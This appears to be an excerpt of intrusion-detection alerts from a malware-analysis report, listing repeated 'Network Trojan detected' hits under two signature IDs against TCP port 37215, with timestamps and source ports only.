                  Timestamp:07/10/24-08:27:11.474921
                  SID:2829579
                  Source Port:58224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865935
                  SID:2835222
                  Source Port:53574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.446265
                  SID:2835222
                  Source Port:55186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2835222
                  Source Port:50614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.566830
                  SID:2835222
                  Source Port:45414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.772225
                  SID:2829579
                  Source Port:34678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144714
                  SID:2829579
                  Source Port:54430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.088464
                  SID:2835222
                  Source Port:36986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.824725
                  SID:2829579
                  Source Port:43578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.731186
                  SID:2835222
                  Source Port:58690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121354
                  SID:2829579
                  Source Port:48738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845068
                  SID:2829579
                  Source Port:37020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2835222
                  Source Port:35660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428131
                  SID:2829579
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2829579
                  Source Port:52474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.939929
                  SID:2835222
                  Source Port:53588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171488
                  SID:2835222
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.402953
                  SID:2829579
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.820169
                  SID:2835222
                  Source Port:58182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.168197
                  SID:2829579
                  Source Port:37128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296401
                  SID:2835222
                  Source Port:35014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.193965
                  SID:2829579
                  Source Port:52356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.267667
                  SID:2835222
                  Source Port:50578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.438343
                  SID:2829579
                  Source Port:51586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469332
                  SID:2829579
                  Source Port:39306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.841630
                  SID:2835222
                  Source Port:48144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.718620
                  SID:2829579
                  Source Port:52634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469526
                  SID:2829579
                  Source Port:46672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.710286
                  SID:2829579
                  Source Port:35042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.343631
                  SID:2829579
                  Source Port:39076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2835222
                  Source Port:58350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.155412
                  SID:2829579
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.225770
                  SID:2835222
                  Source Port:41136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.348992
                  SID:2829579
                  Source Port:59308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.686036
                  SID:2829579
                  Source Port:35638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.623017
                  SID:2835222
                  Source Port:49290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.938068
                  SID:2829579
                  Source Port:34388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.135035
                  SID:2835222
                  Source Port:32984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.122973
                  SID:2829579
                  Source Port:52248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.410349
                  SID:2829579
                  Source Port:46670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.222748
                  SID:2829579
                  Source Port:58042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036040
                  SID:2829579
                  Source Port:47266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.080140
                  SID:2835222
                  Source Port:34682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:30.989816
                  SID:2829579
                  Source Port:36402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558614
                  SID:2835222
                  Source Port:46522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856430
                  SID:2829579
                  Source Port:43376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873303
                  SID:2835222
                  Source Port:34350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.999483
                  SID:2829579
                  Source Port:60800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646221
                  SID:2829579
                  Source Port:41542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.142588
                  SID:2835222
                  Source Port:38942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.164918
                  SID:2835222
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.886738
                  SID:2829579
                  Source Port:39780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.796781
                  SID:2835222
                  Source Port:58266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968527
                  SID:2835222
                  Source Port:35108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.657451
                  SID:2835222
                  Source Port:34934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873958
                  SID:2835222
                  Source Port:44270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845798
                  SID:2829579
                  Source Port:54718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.150508
                  SID:2829579
                  Source Port:43558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885760
                  SID:2829579
                  Source Port:32806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.214710
                  SID:2829579
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.364210
                  SID:2835222
                  Source Port:37008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.632292
                  SID:2835222
                  Source Port:35178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.454576
                  SID:2829579
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.945197
                  SID:2829579
                  Source Port:46356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2829579
                  Source Port:40394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2829579
                  Source Port:40864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816955
                  SID:2829579
                  Source Port:59304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.377189
                  SID:2835222
                  Source Port:57596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.182366
                  SID:2835222
                  Source Port:37896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424443
                  SID:2829579
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829159
                  SID:2835222
                  Source Port:52766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175681
                  SID:2829579
                  Source Port:55194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623254
                  SID:2829579
                  Source Port:50200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.733035
                  SID:2835222
                  Source Port:45192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887676
                  SID:2829579
                  Source Port:44544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.619838
                  SID:2835222
                  Source Port:41512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764510
                  SID:2835222
                  Source Port:39532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.963360
                  SID:2835222
                  Source Port:37322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.824818
                  SID:2835222
                  Source Port:43038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569850
                  SID:2835222
                  Source Port:42412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.764641
                  SID:2835222
                  Source Port:47870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909610
                  SID:2835222
                  Source Port:44518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.852897
                  SID:2835222
                  Source Port:51164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.399018
                  SID:2829579
                  Source Port:49328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.830687
                  SID:2829579
                  Source Port:59824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777167
                  SID:2829579
                  Source Port:57500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2835222
                  Source Port:60488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.103599
                  SID:2835222
                  Source Port:54218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.199768
                  SID:2835222
                  Source Port:56072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918054
                  SID:2829579
                  Source Port:53514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2835222
                  Source Port:49744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661764
                  SID:2835222
                  Source Port:51030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2829579
                  Source Port:53150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.087118
                  SID:2835222
                  Source Port:46340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.817300
                  SID:2829579
                  Source Port:36874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.842336
                  SID:2835222
                  Source Port:55832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200421
                  SID:2835222
                  Source Port:58764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.873299
                  SID:2835222
                  Source Port:38058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.507926
                  SID:2835222
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.787511
                  SID:2829579
                  Source Port:60504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373658
                  SID:2835222
                  Source Port:52324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.594739
                  SID:2835222
                  Source Port:43244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813714
                  SID:2829579
                  Source Port:45118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.671572
                  SID:2835222
                  Source Port:57664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599918
                  SID:2829579
                  Source Port:48616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.638729
                  SID:2829579
                  Source Port:37254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.952694
                  SID:2829579
                  Source Port:36484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541025
                  SID:2835222
                  Source Port:47524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.643057
                  SID:2829579
                  Source Port:36414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:58574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739642
                  SID:2835222
                  Source Port:43116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.634371
                  SID:2835222
                  Source Port:44564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408073
                  SID:2835222
                  Source Port:57324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.299377
                  SID:2829579
                  Source Port:59068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.222864
                  SID:2829579
                  Source Port:59632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065729
                  SID:2829579
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.522324
                  SID:2829579
                  Source Port:53004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.365413
                  SID:2835222
                  Source Port:52640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.617704
                  SID:2829579
                  Source Port:53946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.612334
                  SID:2835222
                  Source Port:52044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.730213
                  SID:2835222
                  Source Port:52228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.829314
                  SID:2829579
                  Source Port:46688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.416063
                  SID:2835222
                  Source Port:46856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522159
                  SID:2835222
                  Source Port:33576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.222864
                  SID:2835222
                  Source Port:46308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587895
                  SID:2835222
                  Source Port:51536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098381
                  SID:2835222
                  Source Port:43868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.534289
                  SID:2835222
                  Source Port:49572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.297520
                  SID:2829579
                  Source Port:46760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2829579
                  Source Port:44834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787394
                  SID:2835222
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851265
                  SID:2835222
                  Source Port:35896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.076959
                  SID:2835222
                  Source Port:44702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.652814
                  SID:2835222
                  Source Port:57584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.279073
                  SID:2829579
                  Source Port:57058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.388281
                  SID:2835222
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.801694
                  SID:2835222
                  Source Port:37928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129654
                  SID:2835222
                  Source Port:54966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.133691
                  SID:2829579
                  Source Port:35466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.660601
                  SID:2835222
                  Source Port:57660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.663912
                  SID:2829579
                  Source Port:46244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.675560
                  SID:2835222
                  Source Port:34336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872450
                  SID:2829579
                  Source Port:49550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000855
                  SID:2829579
                  Source Port:42992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.891994
                  SID:2829579
                  Source Port:40444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.825094
                  SID:2835222
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.104096
                  SID:2835222
                  Source Port:55216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2829579
                  Source Port:41338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:40346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890637
                  SID:2835222
                  Source Port:54518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2829579
                  Source Port:57386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.712804
                  SID:2835222
                  Source Port:42544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835457
                  SID:2835222
                  Source Port:50682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.517321
                  SID:2829579
                  Source Port:37564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2829579
                  Source Port:43302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.781993
                  SID:2829579
                  Source Port:60408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428214
                  SID:2835222
                  Source Port:33774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.424240
                  SID:2829579
                  Source Port:38600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681419
                  SID:2829579
                  Source Port:58754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.040022
                  SID:2835222
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.878894
                  SID:2829579
                  Source Port:44524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583862
                  SID:2829579
                  Source Port:46514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.834726
                  SID:2829579
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2829579
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.892179
                  SID:2835222
                  Source Port:34128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.132533
                  SID:2829579
                  Source Port:47412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.584145
                  SID:2835222
                  Source Port:33642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.129630
                  SID:2835222
                  Source Port:51020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135908
                  SID:2829579
                  Source Port:47574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159669
                  SID:2829579
                  Source Port:33620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614607
                  SID:2835222
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.748611
                  SID:2835222
                  Source Port:60022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822154
                  SID:2835222
                  Source Port:51426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.880980
                  SID:2829579
                  Source Port:55924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.926462
                  SID:2829579
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.306995
                  SID:2835222
                  Source Port:35268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.454516
                  SID:2835222
                  Source Port:46420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.594913
                  SID:2829579
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.574047
                  SID:2829579
                  Source Port:46984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.126416
                  SID:2835222
                  Source Port:52312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.849428
                  SID:2835222
                  Source Port:54936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.627157
                  SID:2829579
                  Source Port:55552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.933427
                  SID:2829579
                  Source Port:46650
                  Destination Port:37215
                  Protocol:TCP
